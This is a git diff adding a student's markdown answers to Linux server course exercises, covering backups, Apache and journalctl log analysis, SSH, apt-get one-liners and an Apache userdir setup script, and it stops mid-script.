**Internet browser** +- Microsoft Office, WPS Office - *Open source:* LibreOffice, OpenOffice, Calligra = **Set of programs to process office documents** +- Riegl RiScan Pro - *Open source:* CloudCompare, MeshLab = **LiDAR processing software** +- MathWorks MATLAB - *Open source:* FreeMat, GNU Octave = **Mathematical & physical calculations** +- Adobe Audition - *Open source:* Audacity = **Audio editor** +- Tux Racer = **Driving game (open source, mentioned just for fun...)** +- Bentley MicroStation = **City/Urban planning oriented CAD program (closed source, only for Windows)** +- Valve Steam = **Game publishing platform (closed source, available for Linux, too)** +- Pitney Bowes MapInfo Professional = **Map and GIS planning (closed source, only for Windows)** +- IrfanView = **Image previewer (closed source, only for Windows)** +- etc... + +**f)** Optional extra task: backup your files (you can use an external USB storage, for example) +-------------- + +**Answer:** Depending on the final goal/purpose, alternative methods can be used. Creating a backup of whole HDD/SSD's is possible with a single dd command (recommended parameter 'status=progress' with large partitions) and with a USB live stick so that this partition/HDD/SSD is not mounted. More sophisticated tools include [Clonezilla](https://en.wikipedia.org/wiki/Clonezilla), for example. It is recommended to backup a server with slightly different methods. + +If the purpose is to copy single files from a location to another location, use *cp* or *rsync* command. + +``` +cp -Rp /mnt/my_hdd1/somefilefolder/* /mnt/my_hdd2/backupfolder/ +``` + +where -R stands for "recursive copy" and "-p" stands for "preserve file & folder permissions". Asterix symbol (*) stands for "include all files". + +Rsync: + +``` +rsync -axHAWXS --numeric-ids --info=progress2 /mnt/my_hdd1/somefilefolder/ /mnt/my_hdd2/backupfolder/ +``` + +**NOTE:** If you copy files between ext2/3/4 and NTFS file systems, keep in mind that any permissions stored in ext2/3/4 partition are not preserved in NTFS partition. NTFS is widely used on Microsoft Windows environments whereas ext2/3/4 are widely used on Unix-based (POSIX) environments. + +In addition, you must consider any [symbolic links](https://en.wikipedia.org/wiki/Symbolic_link) included in copy process. Keep in mind to watch out user permissions as well (does the current user have permissions to copy selected files?). diff --git a/exercises/h2.md b/exercises/h2.md new file mode 100644 index 0000000..6e24cd6 --- /dev/null +++ b/exercises/h2.md @@ -0,0 +1,316 @@ +Linux servers - Exercice 2 +============== + +*Disclaimer:* +-------------- + +This exercise is a part of [Linux servers (ICT4TN021, spring 2018) // Linux-palvelimet (ICT4TN021, kevät 2018)](http://www.haaga-helia.fi/fi/opinto-opas/opintojaksokuvaukset/ICT4TN021) school course organized as a part of Information Technology studies in Haaga-Helia university of Applied Sciences, Helsinki, Finland. Course lecturer [Tero Karvinen](http://terokarvinen.com/) has defined the original assignment descriptions in Finnish presented in this document in English. Answers and translations have been written by Pekka Helenius (me, ~ Fincer). + +**a)** Create two different log events: One successful event and one failed or forbidden event. Analyze the log lines in detail. +-------------- + +**Answer:** + +**Successful event example - Apache server** + +``` +phelenius@my-machine:~$ cat /var/log/apache2/access.log +127.0.0.1 - - [24/Jan/2018:19:14:47 +0200] "GET / HTTP/1.1" 200 3525 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/605.1 (KHTML, like Gecko) Version/11.0 Safari/605.1 Ubuntu/16.04 (3.18.11-0ubuntu1) Epiphany/3.18.11" +127.0.0.1 - - [24/Jan/2018:19:14:47 +0200] "GET /icons/ubuntu-logo.png HTTP/1.1" 200 3623 "http://localhost/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/605.1 (KHTML, like Gecko) Version/11.0 Safari/605.1 Ubuntu/16.04 (3.18.11-0ubuntu1) Epiphany/3.18.11" +``` + +**Analysis:** In this event, user's client program (Web browser) has tried to access site *[localhost](https://en.wikipedia.org/wiki/Localhost)* for which Apache web server (HTTP daemon) has responded with OK code. The log snap reveals + +- client's IP address, in this case it is the same computer (*localhost* / *127.0.0.1*) + +- user ID (just a line in this case) + +- logging time + +- used HTTP method ([GET](https://www.w3schools.com/tags/ref_httpmethods.asp)) + +- retrieved contents, using server defined root directory as root path (*/* and */icons/ubuntu-logo.png*) + +- code 200 ([HTTP_OK](https://ci.apache.org/projects/httpd/trunk/doxygen/group__HTTP__Status.html#ga02e6d59009dee759528ec81fc9a8eeff)) +- target size 3623 (reported to the client) + +- [HTTP Referer](https://en.wikipedia.org/wiki/HTTP_referer) (client) + +- [User agent header](https://en.wikipedia.org/wiki/User_agent) reported by the client. According to the agent string, client browser has been gecko-based [Epiphany web browser](https://en.wikipedia.org/wiki/Epiphany_(GNOME)), using x86_64 processor architecture. This string can be manipulated in the client end. For example, a desktop client web browser can pretend to be a mobile browser. + +Default syntax for Apache log files follow the layout which is described [here](https://httpd.apache.org/docs/2.4/logs.html) under section 'Common Log Format'. + +**Failed event example - Apache server** + +``` +phelenius@my-machine:~$ cat /var/log/apache2/access.log +127.0.0.1 - - [24/Jan/2018:22:30:50 +0200] "GET /this-page-dont-exist HTTP/1.1" 404 510 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/605.1 (KHTML, like Gecko) Version/11.0 Safari/605.1 Ubuntu/16.04 (3.18.11-0ubuntu1) Epiphany/3.18.11" +127.0.0.1 - - [24/Jan/2018:22:30:50 +0200] "GET /favicon.ico HTTP/1.1" 404 500 "http://localhost/this-page-dont-exist" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/605.1 (KHTML, like Gecko) Version/11.0 Safari/605.1 Ubuntu/16.04 (3.18.11-0ubuntu1) Epiphany/3.18.11" +``` + +**Analysis:** In this event, user's client program (Web browser) has tried to access site *http://localhost/this-page-dont-exist* for which Apache web server (HTTP daemon) has responded with error code. The log snap reveals + +- client's IP address, in this case it is the same computer (*localhost* / *127.0.0.1*) + +- user ID (just a line in this case) + +- logging time + +- used HTTP method ([GET](https://www.w3schools.com/tags/ref_httpmethods.asp)) + +- retrieved contents, using server defined root directory as root path (*/this-page-dont-exist* and */favicon.ico*) + +- error code 404 ([HTTP_NOT_FOUND](https://ci.apache.org/projects/httpd/trunk/doxygen/group__HTTP__Status.html#gabd505b5244bd18ae61c581484b4bc5a0)) + +- target sizes 500 & 510 (reported to the client) + +- [HTTP Referer](https://en.wikipedia.org/wiki/HTTP_referer) (client) + +- [User agent header](https://en.wikipedia.org/wiki/User_agent) reported by the client. According to the agent string, client browser has been gecko-based [Epiphany web browser](https://en.wikipedia.org/wiki/Epiphany_(GNOME)), using x86_64 processor architecture. This string can be manipulated in the client end. For example, a desktop client web browser can pretend to be a mobile browser. + +Error logs of an Apache server can be found (by default) at _/var/log/apache2/error.log_. HTTP status codes with brief description are defined on [Apache homepage - Common HTTP Status Codes](https://wiki.apache.org/httpd/CommonHTTPStatusCodes). + +**Other error situations - libraries & typos** + +The most common errors I have encountered on Linux desktop usage as a system administrator are various [Permission denied events](https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/4/html/Step_by_Step_Guide/s1-navigating-ownership.html) mostly as a consequence of a human error (forgetting sudo or something similar) or various typos in commands. I have compiled a lot of programs from source code, making various library errors practically unavoidable in long-term. The syntax of these errors is: [Cannot open shared object file: No such file or directory](https://stackoverflow.com/questions/480764/linux-error-while-loading-shared-libraries-cannot-open-shared-object-file-no-s/480786) where an executable can't find a requested _.so_ library file or version from library path. Both of these errors can be avoided by typing commands precisely and avoiding compiling of software (and relying on official repositories and system-wide package upgrades, considering that installed packages are maintained actively). + +**Other error situations - unsupported Linux OS versions & breaking libraries** + +In long-term, using Linux distributions such as Ubuntu (or any variant that relies on Ubuntu package repositories, such as Linux Mint) become unusable with newer software. The newer versions require more recent library versions which older Ubuntu releases can't possibly provide anymore because official repositories have been shutted down. In this state, either older software must be used (not recommended) on older operating system or the system must be upgraded to more recent version where the newer packages are still available. In some extent, compiling programs from source on an older operating system version is possible and thus life cycle of an old operating system installation can be extended for some programs. This approach, however, leads easily to security risks and bugs which have not been fixed, and especially the security part is essential on Linux server installations. + +I have personal experience on using older Ubuntu 10.04 LTS after the official support dropped down. This operating system was running on desktop use, not in server environment. Thus, I accepted some security risks that may have been present in this approach. In software level, keeping the old Ubuntu installation led to major conflicts with libraries required by modern programs. I had older versions of some of these libraries installed but the newer versions introduced some major changes in function calls and methods so that compiling modern programs against these libraries was practically almost impossible (without major code patches). The most common library which broke first was [glibc](https://www.gnu.org/software/libc/). Ironically, some modern programs I couldn't use ran via [Wine](https://www.winehq.org). That's right: I couldn't use Linux versions but Windows versions ran flawlessly, on my Ubuntu 10.04 LTS. + +Since then, I have moved from Ubuntu to Arch Linux long time ago. Major reason for this is the rolling release model which Arch Linux uses. Compiling software from source is more flexible and, in theory, I don't have to reinstall my operating system never again due to "unsupported operating system version" issues. + +Based on my personal experience, rolling release model is not trouble free and can easily cause program/library conflicts but resolving these conflicts is flexible for an advanced Linux user. As an Arch Linux user, I must be aware of various conflicts which different updates and packages can cause, and I need to know it before I do anything crucial on my operating system. This means that updating software must never be done blindly and I need to be able to solve various error situations that might be present in the system. Usually these errors are poorly or misleadingly documented or not documented at all. Tracking down the root cause of some errors can be very tricky because of multiple components used by various programs. + +In general, some troublesome situation on Arch Linux consist of transitions from older API versions to a newer one. This has happened me once: from Qt4 to Qt5. The issue here is this: some packages are updated more frequently than the others, leading to mixing of two APIs in a system and therefore resulting to broken user experience. + +**Other error situations - a tricky error without clear identification** + +For example, I recently bought a new laptop. I use Firefox on KDE 5 environment. My laptop has Optimus graphics. I have updated all Xorg packages, Mesa drivers, Nvidia drivers and Plasma workspace packages, not forgetting the web browser itself. In some cases, the browser just crashes, and not only the browser but the whole desktop and may lead to laptop freeze so that only hard-reset is a viable solution. In this case, I must try to figure out whether it is Optimus, Mesa, Nvidia, Plasma workspace (or any library in it) or browser component (add-on, compile parameters, hardware acceleration) which cause the crash. This issue is very poorly documented. My best bet to track down the issue is in this case is to check any logs, especially Xorg & Journalctl log events, check all browser add-ons and hardware acceleration, try to check if similar issues for related packages have been reported in various Bugzilla sites for specific package versions and if patches are available, try them out if needed. Reporting this kind of problem to developers is very troublesome because I must track down the exact component which actually causes the crash. Reporting the issue for random developers as "My plasma workspace/kwin crashes while using a browser with Optimus laptop" says practically nothing and may lead to frustation, ignorance and false assumptions. Therefore, I must pin down the root cause myself before any reporting. + +**Other error situations - hardware issues** + +Linux driver support. There are arguments forth and against. Is it good or not? Well, simple answer: it completely depends on used hardware. On my recently purchased laptop, at least Linux kernel 4.15 is needed. In older kernel versions, the laptop doesn't simply boot on Linux. Therefore, at least Ubuntu 18.04 LTS or any other distribution providing this kernel must be installed or I must compile this kernel version (or newer) from source to the target hardware by myself. + +The main rule here: check which components you need support to (yes, components, individual hardware components), try to find out which Linux kernel module they may use or does the hardware vendor provide any driver support (or does the vendor generally have no interest in Linux in which case you can assume no driver support is available for their newer hardware models either unless implemented in Linux kernel or drivers are provided by open source community). In some cases, it's just pure trial-and-error. If you have physical access to the hardware and are permitted to try Linux out on it, your situation is good. In general, older the software, better chance for it to have Linux support for all hardware components. + +If you buy very modern or customized hardware, please consider using a distribution with rolling release model. + +**Other error situations - random errors** + +A good friend of mine contacted me recently. He stated that he couldn't log in to his [Gentoo](https://en.wikipedia.org/wiki/Gentoo_Linux) installation. After a short talk on phone and various approaches I figured out that the problem must be on his LightDM manager so I adviced him to check his _/var/log/lightdm/_ log files. It was proven that the problem was caused by faulty installation of LightDM package files (wrong permissions) or authentication errors oin his [PAM policy](https://en.wikipedia.org/wiki/Privileged_identity_management). To conclude, all these errors can be very random and results of various reasons. + +**Other error situations - a tricky error tracked down** + +Sample of [journalctl](https://www.loggly.com/ultimate-guide/using-journalctl): + +- Boot events logged (kernel, dbus, system daemon, other daemon processes, etc...) + +- Each log event has a timestamp and the hostname (my-machine). + +- In the next part, journalctl introduces the name of a system component responsible for the event (process/kernel). + +- For each process, [process identifier](https://en.wikipedia.org/wiki/Process_identifier) is represented. This identifier is useful for sending various signals like SIGKILL/SIGSTOP to processes, for example ([SIGKILL/SIGSTOP...](https://en.wikipedia.org/wiki/Signal_(IPC))). + +- After PID identifier, the message of the responsible component is represented. Erroneous messages are usually, but not always, marked as bolded red. + +Log events can usually be found either on user's home directory (custom paths used by programs executed only with user permissions) or in system-wide directory _/var/log/_. For example, journalctl log events can be saved in _/var/log/journal_ directory whereas user's [X11](https://en.wikipedia.org/wiki/X_Window_System) errors are logged either in _$HOME/.xsession-errors_ ([.xsession-errors](https://stackoverflow.com/questions/10222449/what-is-xsession-errors)) file or in _$HOME/.local/share/Xorg/_ directory. Some programs use simply user's home directory as their log directory (for example: bash shell logs user history in hidden _$HOME/.bash_history_ file). + +The following journalctl snapshot tells that there is an issue with the bluetooth daemon (used computer is a laptop known as Asus N56JR). + +``` +... +1 Jan 24 17:14:04 my-machine systemd[1]: Started LSB: daemon to balance interrupts for SMP systems. +2 Jan 24 17:14:04 my-machine kernel: Bluetooth: BNEP (Ethernet Emulation) ver 1.3 +3 Jan 24 17:14:04 my-machine kernel: Bluetooth: BNEP filters: protocol multicast +4 Jan 24 17:14:04 my-machine kernel: Bluetooth: BNEP socket layer initialized +5 Jan 24 17:14:04 my-machine dbus[918]: [system] Activating via systemd: service name='org.freedesktop.hostname1' unit='dbus-org.freedesktop.hostname1.service' +6 Jan 24 17:14:04 my-machine bluetoothd[916]: Bluetooth management interface 1.10 initialized +7 Jan 24 17:14:04 my-machine bluetoothd[916]: Failed to obtain handles for "Service Changed" characteristic +8 Jan 24 17:14:04 my-machine whoopsie[985]: [17:14:04] Using lock path: /var/lock/whoopsie/lock +9 Jan 24 17:14:04 my-machine bluetoothd[916]: Not enough free handles to register service +10 Jan 24 17:14:04 my-machine bluetoothd[916]: Error adding Link Loss service +11 Jan 24 17:14:04 my-machine bluetoothd[916]: Not enough free handles to register service +12 Jan 24 17:14:04 my-machine bluetoothd[916]: Not enough free handles to register service +13 Jan 24 17:14:04 my-machine bluetoothd[916]: Not enough free handles to register service +14 Jan 24 17:14:04 my-machine bluetoothd[916]: Current Time Service could not be registered +15 Jan 24 17:14:04 my-machine bluetoothd[916]: gatt-time-server: Input/output error (5) +16 Jan 24 17:14:04 my-machine bluetoothd[916]: Not enough free handles to register service +17 Jan 24 17:14:04 my-machine bluetoothd[916]: Not enough free handles to register service +18 Jan 24 17:14:04 my-machine bluetoothd[916]: Sap driver initialization failed. +19 Jan 24 17:14:04 my-machine bluetoothd[916]: sap-server: Operation not permitted (1) +20 Jan 24 17:14:04 my-machine cron[991]: (CRON) INFO (Running @reboot jobs) +21 Jan 24 17:14:04 my-machine systemd[1]: Starting Hostname Service... +... +``` + +Bluetooth error messages: lines 7-19. Line 8 is not an error message. + +**journalctl analysis - regression test approach** + +The problem seem to be widely known among Ubuntu & Arch Linux users, according to a short search in the internet. There is a [launchpad report](https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1490349) but not a simple answer is given there. There is a suggestion to downgrade bluez package on [Arch Linux forum](https://bbs.archlinux.org/viewtopic.php?id=195886). [AskUbuntu](https://askubuntu.com/) website has many threads for this issue. + +This kind of problems must be examined carefully. Preferred method, as the software component has been tracked down, is regression test for this component. In regression test, the commit or commits which break the desired functionality are hunted down. Tricky part in regression test is to do it as soon as the problem has been identified: more the working package version and faulty one differ from each other, more effort is required to pin down the commits. + +Another dilemma are various dependencies: in this case, we can blame bluez package. But is it actually bluez which broke the functionality? Or is it a dependency required by bluez package? Or a dependency of a dependency? If tracking down the root cause of a problem lead to this situation, it's like looking for a correct path in a giant tree or a dense bush. One crucial examination can still be done: is the problem present in some other program, too? If it is, then we can exclude all other packages from our search instead of common packages required by two individual programs. Of course, this is not foolproof either because program A can depend only on small code part of a dependency package (simple function call) whereas program B can utilize many more functions of the same dependency package. + +Basic principle of a regression test is to compile suspected packages from source, two different versions: one where the problem is present, and another one where it is not. We continue compiling these two versions as long as we can pick up individial commits which likely cause the breakage in program functionality. To put it simple: it is an iteration process. [Git bisect](https://git-scm.com/docs/git-bisect) method provides a way to do this, for example. + +Once the problematic commit/commits are known, we can fix the code ourselves and, for projects where the code is available to use, we can make a [pull request](https://help.github.com/articles/about-pull-requests/) which is accepted by verified developer, or in some cases, we can make our own [fork repository](https://confluence.atlassian.com/bitbucket/forking-a-repository-221449527.html) of the package/component/program. Therefore, commiting [a patch](https://www.thegeekstuff.com/2014/12/patch-command-examples/) or patchset to source code is possible. + +**journalctl analysis - our bluez package** + +In bluez error case, we should check all relevant error messages written by bluetooth daemon to STDERR output. By analysing [BlueZ source code](https://github.com/pauloborges/bluez) ([alternative link](https://git.kernel.org/pub/scm/bluetooth/bluez.git)) we can see that the message present in journalctl log snapshot can be found in source code as well. In more detail, the following source code files (C code): + +``` +phelenius@my-machine:~/bluez-master$ grep -Ril "Not enough free handles to register service" +profiles/proximity/reporter.c +plugins/gatt-example.c +attrib/gatt-service.c +``` + +Tracking down the problem even further can require analysis of the relevant parts of these files in addition to regression testing. Of course, hardware components where the error is present must be taken into account, too. + +**Other error situations - A simple test case (command which succeeds as root but fails otherwise)** + +The following command leads to an error situation (STRERR) if executed with normal user rights. If you run this command in root shell, it succeeds (STDOUT). Switch to root shell by executing _su root_ in your shell environment. + +**NOTE!** If you use root shell for running any script, be **aware** and be **always** sure what you are about to do. You can log out from root shell with _exit_ command. Do not run scripts from untrusted sources as root. + +``` +for i in {0..4}; do touch $HOME/$i; mv $HOME/$i /usr/ 2>/dev/null && echo "Okay, you can do that. You are the god of the system" || echo "Sorry, no way. Do not even try that. You are not a god on \"$(hostname)\"" && if [[ -f $HOME/$i ]]; then rm $HOME/$i; fi ; done +``` + +Command description: + +1. Command creates five individual files in a foor loop (0, 1, 2, 3, and 4) in the current user's home directory. For root, the folder path is simply _/root_ + +2. For each created file, move it from the $HOME directory to system folder _/usr_. In a case of error, write default error message (STDERR) to _null_ device _/dev/null_ which basically means that we don't print the default error message. Number _2_ stands for STDERR in this shell environment. _>_ means "write to". The main idea behind this is that we don't want to see the default error message if command _mv_ fails. Instead, we handle error situations in ways described in steps 4 and 5. + +3. For each created file, if _mv_ command succeeds (STDOUT), do as it's stated after _&&_ and before _||_ (echo "Okay..."). More about these syntaxes: [Bash Reference Manual](http://www.gnu.org/software/bash/manual/bashref.html#Lists) + +4. For each created file, if _mv_ command fails (STDERR), execute as it's stated after _||_ symbols (echo "Sorry..."). Practically, you end up to this scenario if the current user don't have a home folder defined in $HOME variable or if the current user doesn't have writing permissions to the system folder _/usr_. The most common cause for error is the latter one (Permission denied) because the writing permission in _/usr_ directory is reserved only for _root_ user. + +5. For each file, in error situation, there is a command call _$(hostname)_ included. This command call prints out the output of _hostname_ command which, in our case, is the computer name. [Craracter escapes](http://www.gnu.org/software/bash/manual/bashref.html#Escape-Character) (slashes _\_) must be used if we want to use double quotes inside double quotes of our _echo_ command. With escapes, we basically tell the _echo_ command that " symbol, if preceded by \, must be included in the clause itself and it is not the end point of our clause. Alternative writing method for the _echo_ command is as follows: echo 'my "clause"'. Note single quotes here. Here we tell for the _echo_ command that the clause starts and ends with single quotes and, therefore, we don't have to escape our double quotes. This is a basic principle for any bash shell commands, including _grep_ (for example: cp --help | grep -i "\-R") etc. + +Why do we write _$(hostname)_ and not simply _hostname_? We simply use bash internal [Command Substitution feature](http://www.gnu.org/software/bash/manual/bashref.html#Command-Substitution). + +6. For each file, we do our last part. We check whether the file exists in the current user's home directory. If the file ($HOME/$i) exists, remove it. We end up to this situation mostly because of failures in moving the created file into _/usr_ directory. + +7. Because all steps 2-6 have been executed inside the for loop, we stop our loop sequence by writing simply _done_. + +Semicolons (;) are used because the script is so called _one liner_ script, meaning that multiple bash commands are stacked together, not written into multiple lines. The script can also be written in multiple lines and saved into _myscript.sh_ file for further usage. Execution rights for the script file are been given with _chmod +x myscript.sh_ command in a case where user's [umask values](https://wiki.archlinux.org/index.php/umask) do not grant execution permission for a file by default (this is the default case). In addition, we must include a shell definition in the first line in our _myscript.sh_ file. Practically, the definition is some of the following strings: *#!/bin/bash, #!/bin/sh, #!/bin/zsh, #!/bin/tcsh, #!/bin/csh, #/bin/ksh*, etc. In our case, it is _#!/bin/bash_ + +More about bash shell functionality can be found here: [Bash Reference Manual](http://www.gnu.org/software/bash/manual/bashref.html). The site is highly recommended for anyone writing advanced bash scripts. + +**b)** Optional task, not teached yet: Install SSH daemon. Try some of the following commands on your own SSH server: ssh-copy-id, sshfs, scp or git. (The easiest command might be scp: ‘scp foo.txt tero@example.com:’) +-------------- + +**Answer:** + +Execute the following + +``` +sudo apt-get update && sudo apt-get install openssh-server openssp-sftp-server git sshfs && sudo systemctl start ssh.service && systemctl status ssh.service | grep "Active:"* +``` + +If SSH daemon service is currently active, we do as follows: + +Let's execute a command sequence where we connect to Haaga-Helia's SSH server ([Secure Shell (developer Tatu Ylönen, 1995)](https://fi.wikibooks.org/wiki/SSH)) and upload a local file _nullfile_ to the SSH server's current user home directory. We create this local file with _touch nullfile_ command. In the following output, all critical address information is masked with character pattern XXXX. + + +``` +phelenius@my-machine:~$ ssh XXXXXX@haaga-helia.fi +The authenticity of host 'haaga-helia.fi (XX.XX.XX.XX)' can't be established. +RSA key fingerprint is XXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX. +Are you sure you want to continue connecting (yes/no)? yes +Warning: Permanently added 'haaga-helia.fi,XX.XX.XX.XX' (RSA) to the list of known hosts. +XXXXXX@haaga-helia.fi's password: +Last login: Tue Oct 31 19:25:16 2017 from XX-XX-XX-XX-XXXX.fi +[XXXXXX@haaga ~]$ pwd +/u10/XXXXXX +[XXXXXX@haaga ~]$ exit +logout +Connection to haaga-helia.fi closed. +phelenius@my-machine:~$ touch nullfile +phelenius@my-machine:~$ scp nullfile XXXXXX@haaga-helia.fi:/u10/XXXXXX/ +XXXXXX@haaga-helia.fi's password: +nullfile +100%0 0.0KB/s 00:00 +phelenius@my-machine:~$ ssh XXXXXX@haaga-helia.fi +XXXXXX@myy.haaga-helia.fi's password: +Last login: Wed Jan 24 23:41:44 2018 from XX-XX-XX-XX-XXXX.fi +[XXXXXX@haaga ~]$ ls |grep nullfile +nullfile +[XXXXXX@haaga ~]$ exit +logout +Connection to haaga-helia.fi closed. +phelenius@my-machine:~$ +``` + +Other local ssh commands (etc.) can be found with command *ls /usr/bin |grep ssh* + +**c)** Create an apt-get command of your dreams: one single command or one-liner which installs your favorite applications. +-------------- + +**Answer:** + +Let's install the following packages (with apt-get install) and equally, remove the following packages (with apt-get purge) and possible orphaned packages (with apt-get autoclean) + +``` +sudo apt-get update && sudo apt-get -y install \ +apache2 \ +wireshark-gtk \ +fail2ban \ +ettercap-text-only \ +varnish \ +mariadb-server \ +mariadb-client \ +php7.0 \ +epiphany-browser \ +openssh-server \ +openssh-sftp-server \ +phpmyadmin \ +gnome-terminal \ +git \ +cmake \ +gedit \ +aptitude \ +build-essential \ +vlc \ +gpaint \ +transmission-cli \ +wcalc && \ +sudo apt-get -y purge --remove firefox firefox-locale-en mousepad xfce4-terminal catfish onboard gnome-mines gnome-sudoku && \ +sudo apt-get autoclean +``` + +**d)** Install three new command line programs using your command line package manager. Try each of these programs in their target environment and purpose. +-------------- + +**Answer:** + +Let's pick up the following CLI (command line) programs: + +- *[lynx](https://en.wikipedia.org/wiki/Lynx_(web_browser)) - classic non-graphical (text-mode) web browser* +- *[libimage-exiftool-perl](https://en.wikipedia.org/wiki/Exiftool) - library and program to read and write meta information in multimedia files* +- *[fakeroot](https://wiki.debian.org/FakeRoot) - tool for simulating superuser privileges* + +The abovementioned package descriptions can be extracted with _aptitude show package_ command once the target package name is known and _aptitude_ is installed. + +Let's install those target packages: + +``` +sudo apt-get install lynx libimage-exiftool-perl fakeroot +``` + +**Lynx** is a client based web browser. **Exiftool** is a CLI tool for processing, examining and manipulating exif metadata present in audio and image files. **fakeroot** is, as the name stands for, a program which is tricks the current user by giving a false assumption of being root user. + +**Example runtime screenshots of each program:** + +1. [Lynx (https://www.hs.fi - front page)](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/h2-lynx.png) +2. [Exiftool (examined CR2 file metadata)](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/h2-exiftool.png) +3. [fakeroot (asked who am i, accessed fakeroot environment, created a new file in fakeroot environment and asked who am i again. It is claimed that the current user is root although this is not true, as can be seen when exiting the fakeroot environment)](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/h2-fakeroot.png) + diff --git a/exercises/h3.md b/exercises/h3.md new file mode 100644 index 0000000..0420e20 --- /dev/null +++ b/exercises/h3.md @@ -0,0 +1,475 @@ +Linux servers - Exercice 3 +============== + +*Disclaimer:* +-------------- + +This exercise is a part of [Linux servers (ICT4TN021, spring 2018) // Linux-palvelimet (ICT4TN021, kevät 2018)](http://www.haaga-helia.fi/fi/opinto-opas/opintojaksokuvaukset/ICT4TN021) school course organized as a part of Information Technology studies in Haaga-Helia university of Applied Sciences, Helsinki, Finland. Course lecturer [Tero Karvinen](http://terokarvinen.com/) has defined the original assignment descriptions in Finnish presented in this document in English. Answers and translations have been written by Pekka Helenius (me, ~ Fincer). + +**a)** Install Apache web server and set up a working web environment for each system user (http://example.com/~tero). Test the correct functionality with a sample website. +-------------- + +**Answer:** + +``` +#!/bin/sh + +############ +# List package names of Uncomplicated Firewall ja Apache HTTP web server in a new variable PROGRAMS +# +PROGRAMS="ufw apache2" + +############ +# Define new function 'install' +# +# Function 'install' - BEGIN +function install() { + + ############ + # Look for executable 'apt-get', silent error printing (stderr), print count of matching strings. + # Define these checks in a new variable APT_CHECK so that these checks can easily be performed later in the script. + # + # grep part could have been excluded but it is still good to check that this file is not compromised and is truly + # an executable binary file. + # + # EXAMPLE If the system is compromised and the attacker replaces file /usr/bin/apt-get with his/her own version, the following + # APT_CHECK might successfully pass without additional grep pipe (check additional notes below). + # + # Demonstration is as follows (in root shell, because we assume that the attacker has access to root account). + # It is pretty clear that if the attacker has root access, almost all hope is lost because the attacker can likely access and modify almost any part in the system. However, we don't speculate with this option here. + # + # root@my-machine:/home/phelenius# echo -e "#\!/bin/sh\necho \"Attacker's code\"\n" > /usr/bin/malicious + # root@my-machine:/home/phelenius# chmod +x /usr/bin/malicious + # root@my-machine:/home/phelenius# which malicious + # /usr/bin/malicious + # + # The file /usr/bin/malicious is identified as executable. However, if we check its mimetype, we can find out the following: + # root@my-machine:/home/phelenius# file --mime-type $(which malicious) + # /usr/bin/malicious: text/plain + # + # Therefore we can find out the executable we though would be a binary is simply a text file. In similar way, the following APT_CHECK command would pass without grep pipe which fills the security gap a little bit. However, there's still a hole. A major risk still exist because attacker could have replaced the valid apt-get executable with his/her own malicious binary file (with correct mimetype application/x-sharedlib). In this scenario, a checksum validation should seriously be considered (compare against a trusted apt-get binary file). + # + APT_CHECK=$(file --mime-type $(which apt-get) 2> /dev/null | grep -o application | wc -w) + + ############ + # The next if statement has the following conditions: + # if apt-get command is found in the system (APT_CHECK variable check), and... + # ...if the current user is not root (UID is not 0), and... + # ...the current user belongs to sudo group + # + if [[ $APT_CHECK -eq 1 ]] && [[ $(id -u) -ne 0 ]] && [[ $(groups | grep -o sudo | wc -w) -eq 1 ]]; then + + ############ + # Update packages from sources listed in /etc/apt/sources.list file and in /etc/apt/sources.d/ directory + # + sudo apt-get update + + ############ + # Install programs, which have been defined in the variable PROGRAMS + # + sudo apt-get -y install $PROGRAMS + + ############ + # If the previous command succeeded, pass and execute the commands inside if statement + # + if [[ $? -eq 0 ]]; then + + ############ + # Enable Apache2 specific userdir module + # + sudo a2enmod userdir + + ############ + # Enable "ServerName" parameter with value 'www.example.com' in Apache's default page configuration file (000-default.conf) + # + sudo sed -i 's/#ServerName www\.example\.com/ServerName www\.example\.com/' /etc/apache2/sites-enabled/000-default.conf + + ############ + # Add "ServerAlias" after "ServerName" in Apache's default page configuration file (000-default.conf) + # + sudo sed -i '/ServerName www\.example\.com/a\ \ \ \ \ \ \ \ ServerAlias example\.com' /etc/apache2/sites-enabled/000-default.conf + + ############ + # Add new local virtual host example.com to /etc/hosts file + # + echo -e "127.0.0.1\texample.com" | sudo tee -a /etc/hosts + + ############ + # Restart Apache2 HTTP web server daemon + # + sudo systemctl restart apache2.service + fi + fi +} +# Function 'install' - END + +############ +# Execute the function 'install', described above +# +install + +############ +# Create public_html directory in the current user's home directory (either $HOME or ~ can be used) +# +mkdir -p ~/public_html/ + +############ +# Create a new file index.html inside $HOME/public_html with the following html contents: +# +echo -e '\ +\n \ +\n \ +\t\n \ +\t\tTest\n \ +\t\n \ +\t\n \ +\t\t

Test

\n \ +\t\n \ +\n \ +' \ +> ~/public_html/index.html + +# About the echo command: +# \t stands for tabulator +# \n stands for a newline +# \ stands for a newline for multiline input in shell environment +# > stands for writing the contents of the echo command into the file/output mentioned after this symbol. +# -e stands for "enable interpretation of backslash escapes" (meaning that you can use \t \n \r \s....symbols in echo command) +################################# + +# Is the following procedure secure? However, something found in the internet: +# +# "Basically, the Apache server does not only require read permissions of all files it serves, but the execution permission of all directories in the path of your virtual host." +# https://askubuntu.com/questions/451922/apache-access-denied-because-search-permissions-are-missing +# +chmod 701 $HOME + +############ +# Test the created site with the default graphical web browser as the current user (retrieved with whoami command + bash internal command substitution method) +# +xdg-open http://example.com/~$(whoami)/ + +``` + +**b)** Browse and explore the websites on your local host. Find out any hints of successful (200 ok) website load events and failed load events (for example, 404 not found). Analyse the relevant lines. +-------------- + +**Answer:** + +**NOTE!** My detailed answer to this assignment is in the previous exercise 2, section a) (successful & failed event + analysing them). Link: [Exercise 2]() + +In my answer I have analysed Apache web server log lines. The logic is exactly same than required in this assignment. Apache logs each event when a client (web browser, for example) try to access a file or location in server. + +**c)** Create a purposeful error in any code line which is executed by Apache web server (PHP or Python, for example). Find out any relevant log lines and analyse them in detail. +-------------- + +**Answer:** + +Let's install PHP 7.0 with Apache2, and execute a shell script which does as required. + +``` +#!/bin/sh + +############ +# Look for executable 'apt-get', silent error printing (stderr), print count of matching 